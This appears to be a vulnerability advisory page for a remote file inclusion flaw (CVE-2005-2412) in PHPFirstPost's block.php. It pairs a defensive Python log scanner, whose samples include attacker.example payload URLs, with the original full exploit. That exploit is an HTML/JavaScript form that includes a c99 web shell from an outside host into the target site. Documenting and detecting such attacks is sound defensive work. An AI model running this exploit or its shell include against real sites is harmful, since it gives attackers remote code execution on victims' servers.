PHPFirstpost 'Block.PHP' Remote File Inclusion Vulnerability

Vulnerability ID: 1112930    Vulnerability type: Input validation
Published: 2007-05-12    Updated: 2007-05-12
CVE ID: CVE-2005-2412    CNNVD-ID: CNNVD-200508-038
Platform: PHP    CVSS score: 5.0
|Source
https://www.exploit-db.com/exploits/3906
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200508-038
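|Vulnerability details
The block.php file in PHPFirstPost contains a PHP remote file inclusion vulnerability. It allows a remote attacker to execute arbitrary PHP code via the Internet parameter (the exploit code below passes its value as Include= in the query string of block.php).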
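
A defensive companion to the description above, as an added example that is not part of the original advisory or exploit: a Python check that flags access-log requests to block.php whose Include parameter points at a remote resource. The log lines, host names and function names are constructed for illustration, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Stream wrappers that let PHP's include() pull in content from outside the web root.
REMOTE_WRAPPER = re.compile(r"^\s*(?:(?:https?|ftps?|php|expect)://|data:)", re.I)
# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP ranges, placeholder hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/May/2007:10:01:02 +0000] "POST /blog/block.php?Include=http://attacker.example/payload.txt? HTTP/1.1" 200 512',
    '203.0.113.7 - - [12/May/2007:10:01:09 +0000] "GET /blog/block.php?include=http%253A%252F%252Fattacker.example%252Fp.txt HTTP/1.1" 200 512',
    '198.51.100.4 - - [12/May/2007:10:02:00 +0000] "GET /blog/block.php?Include=sidebar HTTP/1.1" 200 2048',
    '198.51.100.4 - - [12/May/2007:10:02:05 +0000] "GET /blog/index.php?ref=http://example.org/ HTTP/1.1" 200 4096',
]

def rfi_attempt(log_line, script="block.php", param="include"):
    """Return the suspicious value if the line requests `script` with `param`
    set to a remote wrapper URL, otherwise None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not unquote(url.path).lower().endswith("/" + script):
        return None
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        # parse_qsl percent-decodes once; decode again to catch double encoding.
        value = unquote(value)
        # Name is compared case-insensitively so the rule errs on the broad side.
        if name.lower() == param and REMOTE_WRAPPER.match(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, value) for every line that looks like an RFI attempt."""
    hits = []
    for line in lines:
        value = rfi_attempt(line)
        if value is not None:
            hits.append((line.split()[0], value))
    return hits

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"possible RFI against block.php from {ip}: Include={value}")
```

The form in the exploit submits with POST but carries the parameter in the action URL, so the request line of the access log still shows it; a payload sent only in a POST body would need request-body logging or a WAF rule instead.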
|Exploit
<html>
<head>
<title>..:: PhpFirstPost blog   Remote File Include Exploit ::..</title>

<script language="JavaScript">

/*


        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo---------------------------------------------------

[ Y! Underground Group ]
[   Dj7xpl@yahoo.com   ]
[    Dj7xpl.2600.ir    ]

----ooooO-----Ooooo--------------------------------------------------
    (   )     (   )
     \ (       ) /
      \_)     (_/

---------------------------------------------------------------------

[!] Portal   :   PhpFirstPost 0.1
[!] Download :   http://sourceforge.net/projects/phpfirstpost/
[!] Type     :   Remote File Include Exploit

---------------------------------------------------------------------

*/

 var path="/"
 var adress="block.php?" 
 var include ="Include=" 
 var phpshell="http://dj7xpl.by.ru/shell/c99.php?" 

 function command(){
     if (document.rfi.target1.value==""){
        alert("Exploit Failed...");
    return false;
  }



rfi.action= document.rfi.target1.value+path+adress+include+phpshell;
rfi.submit(); 
 }
</script>

</head>

<body bgcolor="#198ccd">
<center>

<p></p>
<form method="post" target="getting" name="rfi" onSubmit="command();">
  <b><font face="batangche" size="3" color="white">Target:</font><font
face="Arial" size="2"
color="white">http://Target.ir/blog</font><br><br>
<font color="#00FF00"size="+1" face="batangche">
</font>
<font color="red" size="2"></font></b>
<input type="text" name="target1" size="20" style="background-color:
white" onmouseover="javascript:this.style.background='red';"
onmouseout="javascript:this.style.background='red';"></p>
<p>
<input type="submit" value="Go -->" name="B1">
<input type="reset" value="Clear" name="B2"></p>
</form>
<p><br>
<iframe name="getting" height="337" width="633" scrolling="yes"
frameborder="0"></iframe>
</p><br><br>
<p><font color="red" size="2" face="batang">Dj7xpl @ Yahoo . com </font></p>
</center>
</body>
</html>

# milw0rm.com [2007-05-12]
|References

Source: XF
Name: php-firstpost-block-file-include(21513)
Link: http://xforce.iss.net/xforce/xfdb/21513
Source: BID
Name: 14371
Link: http://www.securityfocus.com/bid/14371
Source: OSVDB
Name: 18394
Link: http://www.osvdb.org/18394
Source: SECTRACK
Name: 1014563
Link: http://securitytracker.com/id?1014563
Source: BUGTRAQ
Name: 20050724 PHP FirstPost remote file include vulnerability
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=112230599222543&w=2